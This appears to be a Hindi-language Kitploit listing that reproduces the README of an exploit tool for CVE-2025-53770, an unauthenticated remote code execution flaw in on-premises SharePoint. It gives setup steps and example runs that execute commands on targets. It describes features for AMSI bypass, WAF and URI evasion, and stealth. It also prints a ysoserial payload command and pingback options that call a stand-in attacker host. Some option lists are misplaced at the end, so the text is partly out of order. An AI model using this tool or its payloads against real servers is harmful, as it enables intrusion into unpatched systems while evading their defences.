Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-53770 — CVE-2025-53770 को लक्षित करने वाला एक परिष्कृत, विज़ार्ड-संचालित पायथन एक्सप्लॉइट टूल, जो ऑन-प्रिमाइसेस माइक्रोसॉफ्ट शेयरपॉइंट सर्वर (2016, 2019, सब्सक्रिप्शन एडिशन) में एक गंभीर (CVSS 9.8) अप्रमाणित रिमोट कोड निष्पादन (RCE) कमजोरी है। | Kitploit
उपकरण/GitHubGitHub/exfil0/cve-2025-53770
विशेषाधिकार वृद्धिटोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणआईडीएस/आईपीएस से बचनावेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubexfil0/cve-2025-53770

CVE-2025-53770

511 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-53770 को लक्षित करने वाला एक परिष्कृत, विज़ार्ड-संचालित पायथन एक्सप्लॉइट टूल, जो ऑन-प्रिमाइसेस माइक्रोसॉफ्ट शेयरपॉइंट सर्वर (2016, 2019, सब्सक्रिप्शन एडिशन) में एक गंभीर (CVSS 9.8) अप्रमाणित रिमोट कोड निष्पादन (RCE) कमजोरी है।

रिपॉजिटरी देखें

डिवाइन एब्सोल्यूट - CVE-2025-53770 एक्सप्लॉइट टूल

License
Python

अवलोकन

डिवाइन एब्सोल्यूट एक उन्नत, विज़ार्ड-चालित Python एक्सप्लॉइट टूल है जो CVE-2025-53770 को लक्षित करता है, जो ऑन-प्रिमाइसेस Microsoft SharePoint Server (2016, 2019, Subscription Edition) में एक गंभीर (CVSS 9.8) अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता, जो 19 जुलाई, 2025 को एक जीरो-डे के रूप में सामने आई, /_layouts/15/ToolPane.aspx में अविश्वसनीय डेटा के डिसीरियलाइज़ेशन से उत्पन्न होती है। यह टूल केवल नैतिक पेनिट्रेशन टेस्टिंग और अधिकृत सुरक्षा अनुसंधान के लिए डिज़ाइन किया गया है, जो अन्वेषण, शोषण और सत्यापन के लिए बेजोड़ सटीकता, गुप्तता और अनुकूलनशीलता प्रदान करता है।

रिपॉजिटरी: https://github.com/exfil0/CVE-2025-53770

⚠️ कानूनी चेतावनी: यह टूल केवल नियंत्रित वातावरण में स्पष्ट अनुमति के साथ वैध, अधिकृत उपयोग के लिए है। उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है और इसके गंभीर कानूनी परिणाम हो सकते हैं। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

विशेषताएँ

  • मोड:
    • रीकॉन: उन्नत स्कोरिंग और regex (जैसे 16.0.0.\d+-\w+?) के साथ SharePoint उपस्थिति, संस्करण और ToolPane.aspx पहुंच का पता लगाता है।
    • एक्सप्लॉइट: मज़बूत बायपास के साथ ToolPane.aspx के माध्यम से पेलोड डिलीवर करता है।
    • फुल: रीकॉन और एक्सप्लॉइट को जोड़ता है, वैकल्पिक आक्रामक शोषण के साथ।
  • पेलोड जनरेशन:
    • .NET डिसीरियलाइज़ेशन पेलोड (जैसे ObjectDataProvider, LosFormatter) के लिए ysoserial.net को एकीकृत करता है।
    • फॉलबैक HTTP/DNS पिंगबैक पेलोड (जैसे WebRequest.Create, Dns.GetHostEntry) के लिए वैकल्पिक pythonnet।
    • स्पष्ट एन्कोडिंग/डिकोडिंग और बेस64 सत्यापन के साथ GZIP संपीड़न का समर्थन करता है।
    • PowerShell कमांड में AMSI बायपास (बेसिक रिफ्लेक्शन, ऑबफस्केटेड, या कस्टम स्निपेट) इंजेक्ट करता है, जिसमें बेस64-एन्कोडेड (-enc) पेलोड शामिल हैं।
  • बायपास:
    • URI चोरी: रैंडम या फिक्स्ड सफिक्स (जैसे /xp.aspx, UUID-आधारित)।
    • रेफरर स्पूफिंग: कोई नहीं, बाहरी डोमेन (जैसे www.google.com), कस्टम URL, या आंतरिक SharePoint पथ (जैसे /_layouts/15/sharepoint.aspx)।
  • गुप्तता:
    • न्यूनतम RPS फ्लोर (0.01) और बर्स्ट नियंत्रण के साथ अनुकूली दर सीमा।
    • लॉक-संरक्षित गति और जिटर (0-0.1s) के साथ थ्रेड-सुरक्षित समवर्तीता।
  • सत्यापन:
    • संकलित OR regexes, RequestException पर पुनर्प्रयास, और अनुकूलन योग्य स्थिति कोड/पथ के साथ मज़बूत RCE पुष्टि।
  • अन्वेषण:
    • हेडर (जैसे MicrosoftSharePointTeamServices), पथ (जैसे /versions.aspx), और regexes के माध्यम से उन्नत SharePoint पहचान।
  • आउटपुट:
    • विश्लेषण के लिए फोरेंसिक लॉगिंग के साथ JSON परिणाम।
  • उपयोगिता:
    • आसान कॉन्फ़िगरेशन के लिए इंटरैक्टिव विज़ार्ड।
    • गैर-Windows सिस्टम पर ysoserial.net के लिए Mono/Wine का समर्थन।
    • प्रॉक्सी समर्थन (HTTP/SOCKS5) और अनुकूलन योग्य टाइमआउट।

CVE-2025-53770 संदर्भ

  • भेद्यता: /_layouts/15/ToolPane.aspx में डिसीरियलाइज़ेशन के माध्यम से अनधिकृत RCE।
  • प्रभावित: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 भी असुरक्षित)।
  • अप्रभावित: SharePoint Online (M365)।
  • शोषण: 18 जुलाई, 2025 से, राज्य-प्रायोजित अभिनेताओं (जैसे Linen Typhoon) द्वारा "ToolShell" जैसे अभियानों में।
  • पैच: Microsoft पैच (जैसे KB5002768, KB5002754) 19 जुलाई, 2025 को जारी, पूरी तरह से कम करते हैं। CISA KEV लिस्टिंग 21 जुलाई, 2025 तक संघीय पैचिंग अनिवार्य करती है।
  • शमन: पैच लगाएं, पैच के बाद कुंजियाँ घुमाएँ, AMSI/Defender (फुल मोड) सक्षम करें, /ToolPane.aspx POSTs की निगरानी करें, WAF नियमों (जैसे Cloudflare) का उपयोग करें।

स्थापना

आवश्यक शर्तें

  • Python 3.8+
  • निर्भरताएँ:
    root@kitploit:~
    pip install requests termcolor
    
  • वैकल्पिक (.NET सीरियलाइज़ेशन फॉलबैक के लिए):
    root@kitploit:~
    pip install pythonnet
    
  • ysoserial.net:
    • ysoserial.net releases से डाउनलोड करें।
    • ysoserial.exe को एक ज्ञात पथ पर रखें (जैसे ./ysoserial.exe)।
  • Mono/Wine (गैर-Windows सिस्टम):
    root@kitploit:~
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (Homebrew के माध्यम से)
    brew install mono
    
  • Docker लैब (परीक्षण के लिए अनुशंसित):
    root@kitploit:~
    docker pull mcr.microsoft.com/sharepoint/server:2019
    

सेटअप

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
    
  2. Python निर्भरताएँ स्थापित करें:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. सुनिश्चित करें कि ysoserial.exe सुलभ है या निष्पादन के दौरान उसका पथ प्रदान करें।
  4. (वैकल्पिक) गैर-Windows सिस्टम के लिए Mono/Wine सत्यापित करें।

उपयोग

इंटरैक्टिव विज़ार्ड चलाएँ:

root@kitploit:~
python divine_absolute.py

कार्यप्रवाह

  1. मोड चयन:
    • Recon: SharePoint उपस्थिति और संस्करण के लिए स्कैन करता है।
    • Exploit: ToolPane.aspx पर पेलोड भेजता है।
    • Full: रीकॉन + एक्सप्लॉइट (वैकल्पिक आक्रामक मोड)।
  2. लक्ष्य इनपुट:
    • एकल URL (जैसे https://sharepoint.example.com)।
    • URL वाली फ़ाइल (प्रति पंक्ति एक)।
  3. पेलोड कॉन्फ़िगरेशन:
    • ysoserial.net: पथ, गैजेट (जैसे ObjectDataProvider), और कमांड (जैसे cmd /c whoami) निर्दिष्ट करें।
    • File: फ़ाइल से base64 GZIP पेलोड लोड करें।
    • String: सीधे base64 GZIP पेलोड इनपुट करें।
    • Pingback: HTTP/DNS पिंगबैक उत्पन्न करें (जैसे http://attacker.com/callback या sub.attacker.com)।
    • AMSI बायपास: NONE, BASIC_REFLECTION, , या कस्टम स्निपेट चुनें।

उदाहरण कमांड

  • अन्वेषण:
    root@kitploit:~
    python divine_absolute.py
    # चुनें: Mode=Recon, Target=https://sharepoint.example.com
    
  • ysoserial.net के साथ एक्सप्लॉइट:
    root@kitploit:~
    python divine_absolute.py
    # चुनें: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
    
  • सत्यापन के साथ फुल मोड:
    root@kitploit:~
    python divine_absolute.py
    # चुनें: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
    
  • DNS पिंगबैक:
    root@kitploit:~
    python divine_absolute.py
    # चुनें: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
    

आउटपुट

परिणाम xanthorox_results.json में सेव होते हैं जिनमें फ़ील्ड होते हैं:

  • target: परीक्षण किया गया URL।
  • sharepoint_detected: बूलियन।
  • toolpane_accessible: बूलियन।
  • exploited: बूलियन (पेलोड भेजा गया)।
  • verified_rce: बूलियन/कोई नहीं (RCE पुष्टि)।
  • error: कोई भी त्रुटि सामने आई।

उदाहरण:

root@kitploit:~
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

संबोधित सुधार

यह संस्करण निम्नलिखित को ठीक करता है:

  • अनुकूली दर सीमा: सफलता/त्रुटि गणना के लिए गैर-पुनर्प्रयास त्रुटियों (जैसे 404) को अनदेखा करता है; न्यूनतम RPS फ्लोर (0.01) लागू करता है।
  • AMSI इंजेक्शन: बेस64-एन्कोडेड PowerShell (-enc) कमांड में बायपास को डिकोड और इंजेक्ट करता है; गैर-PowerShell (जैसे cmd.exe) को चेतावनी के साथ समर्थन करता है।
  • पिंगबैक फॉलबैक: विश्वसनीय DNS पिंगबैक के लिए Dns.GetHostEntry के साथ pythonnet का उपयोग करता है (प्रायोगिक, पूर्ण प्रभाव के लिए गैजेट की आवश्यकता है)।

परीक्षण अनुशंसाएँ

  • लैब सेटअप: सुरक्षित परीक्षण के लिए SharePoint Server 2019 Docker कंटेनर (अनपैच) का उपयोग करें।
  • WAF परीक्षण: अनुकूली RPS के साथ Cloudflare या समान WAF के विरुद्ध बायपास मान्य करें।
  • पेलोड परीक्षण: ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 के साथ पेलोड उत्पन्न करें और DNS लॉग सत्यापित करें।

ज्ञात सीमाएँ

  • पिंगबैक विश्वसनीयता: pythonnet में Dns.GetHostEntry विशिष्ट गैजेट श्रृंखला के बिना ट्रिगर नहीं हो सकता है।
  • जटिल कमांड: गैर-मानक PowerShell कमांड के लिए मैन्युअल AMSI बायपास इंजेक्शन की आवश्यकता हो सकती है।
  • WAF पहचान: कुछ WAF बायपास के बावजूद पेलोड को ब्लॉक कर सकते हैं; अच्छी तरह से परीक्षण करें।

योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें।
  2. एक फीचर ब्रांच बनाएँ (git checkout -b feature/awesome-improvement)।
  3. परिवर्तन कमिट करें (git commit -m "Add awesome improvement")।
  4. ब्रांच पर पुश करें (git push origin feature/awesome-improvement)।
  5. एक पुल रिक्वेस्ट खोलें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है। विवरण के लिए LICENSE देखें।

स्वीकृतियाँ

  • xAI: अत्याधुनिक सुरक्षा अनुसंधान को प्रेरित करने के लिए।
  • ysoserial.net Team: .NET डिसीरियलाइज़ेशन पेलोड जनरेटर के लिए।
  • सुरक्षा समुदाय: CVE-2025-53770 शोषण और शमन में अंतर्दृष्टि के लिए।

संपर्क

  • लेखक: @exfil0
  • मुद्दे: GitHub Issues
  • टेलीग्राम: https://t.me/GOTOCVE

नोट: उपयोग से पहले हमेशा नियंत्रित लैब में पेलोड और कॉन्फ़िगरेशन सत्यापित करें। नैतिक और कानूनी रहें।

टूल डाउनलोड करें
CONCAT_OBFUSCATED
  • बायपास विकल्प:
    • URI: NONE, FIXED (जैसे /xp.aspx), RANDOM (UUID-आधारित)।
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL।
  • नेटवर्क सेटिंग्स:
    • प्रॉक्सी (जैसे http://127.0.0.1:8080)।
    • थ्रेड, टाइमआउट, जिटर और दर सीमा (RPS)।
  • RCE सत्यापन:
    • पथ (जैसे /sitepages/result.txt), regexes (जैसे Xanthorox.*), स्थिति कोड (जैसे 200,403), प्रयास, विलंब और टाइमआउट निर्दिष्ट करें।